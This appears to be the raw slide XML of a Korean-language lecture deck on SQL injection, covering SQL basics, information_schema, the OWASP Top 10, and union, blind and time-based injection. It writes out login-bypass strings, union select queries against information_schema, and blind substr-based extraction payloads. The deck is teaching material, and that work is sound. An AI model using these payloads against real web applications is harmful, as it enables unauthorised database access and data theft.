            <a:ext cx="9429368" cy="1474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Chapter 5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SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3820226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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438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SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR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B03B43-90F9-B94D-91E8-CCEB2BFC4702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="5811206" cy="1666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데이터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>베이스를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>다루기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>위한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>표준</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>프로그래밍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>언어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대부분의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>데이터베이스가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>해당</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>언어를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>사용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EX) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, oracle, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mariadb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ..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218131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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="3162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Information_schema</a:t>
            </a:r>
            <a:endParaRPr lang="en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30D13D-226C-074D-AFB9-D823F6B2E9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="4493538" cy="1666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KR" dirty="0"/>
              <a:t>데이터에 의한 데이터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KR" dirty="0"/>
              <a:t>데이터 사전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KR" dirty="0"/>
              <a:t>데이터 베이스에 저장된 정보들의 정보</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47396FF8-BF57-1040-89CE-8401521B7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382" y="1715900"/>
            <a:ext cx="49911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0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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="1698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Sub query</a:t>
            </a:r>
            <a:endParaRPr lang="en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30D13D-226C-074D-AFB9-D823F6B2E9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="6421951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KR" dirty="0"/>
              <a:t>하나의 SQL 구문안에 들어있는 또 다른 하나의 SQL 구문</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="그림 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E85BB49-A0B0-564D-B4F6-1D890F79B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30" y="2830285"/>
            <a:ext cx="5766619" cy="278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66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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en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30D13D-226C-074D-AFB9-D823F6B2E9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="10541668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KR" dirty="0"/>
              <a:t>SQL 구문 중 사용자의 입력을 받는 부분을 조작하여 데이터베이스를 조회</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>조작할 수 있는 취약점</a:t>
            </a:r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7A1035-A988-ED41-8ECF-E44D1CAC6FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="2662569"/>
            <a:ext cx="3461525" cy="3565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425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>' or '1'='1'#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> ' or '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>' or 1&lt;2#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> ' or 'anything’ like ‘any%’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> ' or 2&gt;1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> ' or 'test'&gt;'t‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> ' or 'whatever‘ IN ('whatever')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> ' or 2 BETWEEN 1 AND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AD5CD8-F945-6F4B-838D-83BCE2473288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6003479" y="2662569"/>
            <a:ext cx="2254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별 주석</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> : #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Oracle , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Ms-sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> : --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10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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438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SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179924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OWASP 2021 TOP 10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88B6E15-AC6C-D648-90FC-0227DA9A1265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="3401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OWASP 2021 TOP 10</a:t>
            </a:r>
            <a:endParaRPr lang="en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532F3F-2A46-2141-B7DC-3BDAEA9164D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1721633"/>
            <a:ext cx="89930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Injection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Broken authentication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Sensitive data exposure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XML external entities (XXE)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Broken access control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Security misconfigurations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Cross site scripting (XSS)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Insecure deserialization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Using components with known vulnerabilities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Insufficient logging and monitoring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276989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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="3121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Union SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en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30D13D-226C-074D-AFB9-D823F6B2E9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="11309506" cy="1666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KR" dirty="0"/>
              <a:t>Union 연산자를 이용하여 공격자가 정상적인 요청에 추가적인 쿼리를 삽입하여 원하는 정보를 얻는 방법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기본적인 순서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>컬럼 개수 맞추기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>데이터베이스 명 찾기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>테이블 이름 찾기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>컬럼 이름 찾기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> -&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>원하는 정보 가져오기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-K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26B362-A83A-FC49-923D-900B222E402E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955870" y="3710511"/>
            <a:ext cx="6096000" cy="30418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425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>컬럼 이름 가져오기</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>‘ union select 1,2,column_name,4 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> limit 1,1#(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>전체 컬럼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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‘ union select 1,2,column_name,4 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>테이블 이름</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>limit 1,1#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>데이터 가져오기</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>‘ union select 1,2,column_name,4 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> limit 1,1#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CAA24AC-D5AC-0B49-8BA6-22B1A6981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081" y="3281961"/>
            <a:ext cx="4520579" cy="313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4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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="3954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Union SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1694245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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="2991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Blind SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR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9F750F-9940-B44A-BD62-F75B6B2298EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="7906332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KR" dirty="0"/>
              <a:t>SQL에서 실행되는 결과 값의 참</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>거짓을 통하여 데이터를 추출하는 방법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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>egloos.zum.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metalbear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/v/3521684</a:t>
            </a:r>
            <a:endParaRPr lang="en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DCF4C-394F-C24D-9F11-BF69E6D0A5C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898171" y="3584138"/>
            <a:ext cx="4676217" cy="165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substr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(name,1,1) from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limit 1,1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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uikun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1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000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substr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(name,2,1)) from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limit 1,1;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ikun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89072D4-B358-7F4A-A90C-B16EB58BF8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="5537213"/>
            <a:ext cx="8228013" cy="13207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425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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1' or ascii(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substr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((select database()),1,1))= 1#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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1’ or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substr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((select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table_name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from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information_schema.tables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where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table_schema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=database()),1,1) &gt; ‘a’#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09B613-08F6-E441-834F-48898E5B5A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898171" y="3003809"/>
            <a:ext cx="4440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Blind SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>결과</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR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D46509-0FF8-594C-932A-DC0FEC20411B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898171" y="4949348"/>
            <a:ext cx="4440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Blind SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>쿼리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42664562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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="3716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Blind SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1103318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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="3857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 Base SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR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9F750F-9940-B44A-BD62-F75B6B2298EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="8177239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Blind SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>공격을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>시도하면서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>참</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>거짓을 구분 할 수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>없을때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Sleep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
